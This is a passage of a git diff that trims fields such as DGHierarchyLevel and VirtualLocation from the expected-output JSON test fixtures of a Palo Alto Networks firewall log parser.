 .../tests/test_port_up_json.json              |  4 ----
 .../tests/test_registration_succeed_json.json |  4 ----
 .../paloalto-ngfw/tests/test_system.json      |  5 ----
 .../tests/test_system_event_10_json.json      |  4 ----
 .../tests/test_system_event_11_json.json      |  4 ----
 .../tests/test_system_event_12_json.json      |  4 ----
 .../tests/test_system_event_1_json.json       |  4 ----
 .../tests/test_system_event_2_json.json       |  4 ----
 .../tests/test_system_event_3_json.json       |  4 ----
 .../tests/test_system_event_4_json.json       |  4 ----
 .../tests/test_system_event_5_json.json       |  4 ----
 .../tests/test_system_event_6_json.json       |  4 ----
 .../tests/test_system_event_7_json.json       |  4 ----
 .../tests/test_system_event_8_json.json       |  4 ----
 .../tests/test_system_event_9_json.json       |  4 ----
 .../paloalto-ngfw/tests/test_threat.json      |  8 +------
 .../paloalto-ngfw/tests/test_threat_02.json   |  8 +------
 .../tests/test_timestamp_palo.json            |  5 ----
 .../tests/test_traffic_event_1_json.json      |  8 +------
 .../tests/test_traffic_event_2_json.json      |  8 +------
 .../tests/test_update_content_json.json       |  4 ----
 .../tests/test_upgrade_package_json.json      |  4 ----
 .../tests/test_user_authentication_json.json  |  4 ----
 .../paloalto-ngfw/tests/test_userid.json      |  9 +-------
 .../tests/test_web_authentication_json.json   |  4 ----
 .../tests/test_wildfire_failure_json.json     |  4 ----
 .../paloalto-ngfw/tests/threat-url-xff.json   |  9 +-------
 .../paloalto-ngfw/tests/threat_cef.json       | 18 ---------------
 .../paloalto-ngfw/tests/threat_csv.json       |  8 +------
 .../paloalto-ngfw/tests/traffic1_csv.json     |  6 -----
 .../paloalto-ngfw/tests/traffic2_csv.json     |  6 -----
 .../paloalto-ngfw/tests/traffic_cef.json      | 23 -------------------
 .../tests/traffic_with_resotimestamp.json     |  3 +--
 .../paloalto-ngfw/tests/udp_deny_csv.json     |  3 +--
 .../paloalto-ngfw/tests/url_cef.json          | 19 ---------------
 .../paloalto-ngfw/tests/userid_cef.json       |  4 ----
 .../paloalto-ngfw/tests/wildfire1_json.json   |  5 ----
 67 files changed, 21 insertions(+), 356 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json
index 08c69d61f..dba765bd4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json	
@@ -30,14 +30,7 @@
       "serial_number": "016401002222"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "12",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "0",
-      "Threat_ContentType": "login",
-      "VirtualLocation": "vsys",
-      "VirtualSystemID": "1"
+      "Threat_ContentType": "login"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json
index 539963216..63c79e671 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json	
@@ -30,14 +30,7 @@
       "serial_number": "01640103000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "12",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "0",
-      "Threat_ContentType": "login",
-      "VirtualLocation": "vsys",
-      "VirtualSystemID": "1"
+      "Threat_ContentType": "login"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json
index ff12d8db6..1b4a52135 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json	
@@ -57,13 +57,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "PanOSSourceDeviceHost": "src_host_list-0",
-      "PanOSSourceDeviceModel": "src_model_list-1",
-      "PanOSSourceDeviceProfile": "src_profile_list-1",
-      "PanOSSourceDeviceVendor": "src_vendor_list-1",
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "hosts": [
         "xxxxx"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json
index 1a4fba4b4..e213912c2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json	
@@ -61,9 +61,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "ip": [
         "1.1.1.1"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json
index 2da36f33e..965583ed3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json	
@@ -65,10 +65,6 @@
     },
     "paloalto": {
       "DirectionOfAttack": "client to server",
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "PanOSSourceLocation": "1.1.1.1-1.1.1.1",
-      "URLCategory": "any",
-      "VirtualLocation": "smtp",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json
index 512ae89e7..4dadbb51b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json	
@@ -52,8 +52,7 @@
       "serial_number": "001701003551"
     },
     "paloalto": {
-      "Threat_ContentType": "end",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json
index add589697..4863396f8 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json	
@@ -52,8 +52,7 @@
       "serial_number": "001701003551"
     },
     "paloalto": {
-      "Threat_ContentType": "end",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "end"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json
index 4fd7b8802..09505692f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json	
@@ -42,7 +42,6 @@
       "version": "2.0"
     },
     "paloalto": {
-      "PanOSQuarantineReason": "Malicious Traffic",
       "authentication": {
         "method": "RADIUS"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 65f2b6940..0c72fdb63 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json	
@@ -34,9 +34,7 @@
       "serial_number": "ABCDEFG"
     },
     "paloalto": {
-      "EventID": "gw-auth",
       "Threat_ContentType": "0",
-      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "login"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index e4b1d5fab..2f8cb93ae 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json	
@@ -34,9 +34,7 @@
       "serial_number": "DFN3535D"
     },
     "paloalto": {
-      "EventID": "gateway-config-release",
       "Threat_ContentType": "0",
-      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "configuration"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
index 6a0a99b82..966ea0b88 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json	
@@ -40,9 +40,6 @@
       "version": "2.0"
     },
     "paloalto": {
-      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
-      "VirtualLocation": "vsys1",
-      "VirtualSystemID": "1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
index e4e153224..6e8e88e79 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json	
@@ -49,8 +49,7 @@
       "serial_number": "1801017000"
     },
     "paloalto": {
-      "Threat_ContentType": "start",
-      "VirtualLocation": "vsys"
+      "Threat_ContentType": "start"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
index 9d2db872a..4eef50d9d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json	
@@ -39,10 +39,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "VirtualLocation": "vsys1",
-      "VirtualSystemID": "1"
-    },
     "related": {
       "hosts": [
         "PA-VM"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
index d14918dab..a6c93b2c4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json	
@@ -58,14 +58,8 @@
       "serial_number": "000011111112222"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "982",
-      "DGHierarchyLevel2": "117",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "url"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index e8c257c69..6fd2dbfa0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json	
@@ -63,15 +63,8 @@
       "serial_number": "no-serial"
     },
     "paloalto": {
-      "ContentType": "text/plain",
-      "DGHierarchyLevel1": "463",
-      "DGHierarchyLevel2": "525",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "url"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
index 717e963a0..ff9edc877 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json	
@@ -57,10 +57,6 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
-    "paloalto": {
-      "PanOSSourceLocation": "US",
-      "VirtualLocation": "vsys1"
-    },
     "related": {
       "hosts": [
         "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
index 3e52f494c..ab8aae097 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json	
@@ -30,11 +30,6 @@
       "serial_number": "11111114444"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "auth-success",
       "Threat_ContentType": "auth"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
index eb10d6148..49c1758ab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json	
@@ -49,8 +49,7 @@
       "serial_number": "1801016000"
     },
     "paloalto": {
-      "Threat_ContentType": "start",
-      "VirtualLocation": "vsys1234"
+      "Threat_ContentType": "start"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
index 3af5d5428..c4c2b4c70 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json	
@@ -37,10 +37,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url-filtering"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
index 5e1cc96a9..17ae8dd31 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json	
@@ -37,10 +37,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dhcp"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
index f4541dcbf..72af37535 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dnsproxy"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
index 3142ed671..ee2f64323 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json	
@@ -60,14 +60,8 @@
       "serial_number": "no-serial"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "463",
-      "DGHierarchyLevel2": "467",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
-      "Threat_ContentType": "file",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "file"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
index f08a677ef..aa4388311 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json	
@@ -37,9 +37,7 @@
       "serial_number": "PF000000"
     },
     "paloalto": {
-      "EventID": "gateway-switch-to-ssl",
       "Threat_ContentType": "0",
-      "VirtualLocation": "vsys1",
       "connection": {
         "stage": "tunnel"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
index bbf2d4e97..ed54db08a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json	
@@ -33,10 +33,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index f569f8246..6ba2ed95f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
@@ -51,16 +51,10 @@
       "serial_number": "012001002253"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "24",
-      "DGHierarchyLevel2": "315",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
-      "VirtualLocation": "vsys1",
       "threat": {
         "id": "40005",
-        "name": "LDAP: User Login Brute Force Attempt",
-        "type": "vulnerability exploit detection"
+        "name": "LDAP: User Login Brute Force Attempt"
       }
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
index 610ab7c24..f5f961342 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json	
@@ -73,14 +73,8 @@
       "serial_number": "007954000XXXXXX"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "999",
-      "DGHierarchyLevel2": "1111",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
-      "Threat_ContentType": "file",
-      "URLCategory": "business-and-economy",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "file"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
index 25db7ff0a..501fb4be5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
@@ -38,12 +38,7 @@
       "version": "0.0.-1"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "556",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "globalprotect",
-      "VirtualSystemID": "1",
       "connection": {
         "stage": "logout"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
index c3d742b70..80edd7cf5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json	
@@ -62,13 +62,8 @@
       "serial_number": "007954000370000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "997",
-      "DGHierarchyLevel2": "1169",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
       "Threat_ContentType": "vulnerability",
-      "VirtualLocation": "vsys1",
       "threat": {
         "category": "brute-force",
         "id": "SSH User Authentication Brute Force Attempt(40015)"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
index b4a75c57c..6a5a4358f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json	
@@ -64,14 +64,8 @@
       "serial_number": "00795400037XXXX"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "997",
-      "DGHierarchyLevel2": "1169",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url",
-      "URLCategory": "computer-and-internet-info",
-      "VirtualLocation": "vsys1"
+      "Threat_ContentType": "url"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
index a470b3176..1ad423127 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json	
@@ -32,10 +32,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "ntpd"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
index af31efa35..ed9754708 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json	
@@ -36,10 +36,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "port"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
index c9ebd467e..76aeaa4ce 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json	
@@ -36,10 +36,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "fb"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
index 2d21571e0..c773195d0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json	
@@ -30,11 +30,6 @@
       "serial_number": "016201000000"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
-      "EventID": "test-event",
       "Threat_ContentType": "vpn"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
index 8a299b691..70c358caf 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json	
@@ -34,10 +34,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
index 4b7dc612f..b481b6c39 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url-filtering"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
index 7901b05ce..989c8393e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json	
@@ -37,10 +37,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dhcp"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
index 30a9a9970..a92e1d91b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json	
@@ -33,10 +33,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
index f74ff5a47..c546509c6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
index 8c122fc65..452b9d6bb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json	
@@ -29,10 +29,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
index 524aef010..4b2a51b0f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
index f305c2d3e..36807c11d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
index 63f3bd258..a83bce94f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json	
@@ -30,10 +30,6 @@
       "product": "PAN-OS"
     },
     "paloalto": {
-      "DGHierarchyLevel1": "0",
-      "DGHierarchyLevel2": "0",
-      "DGHierarchyLevel3": "0",
-      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
index a00e82987..548954584 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json	
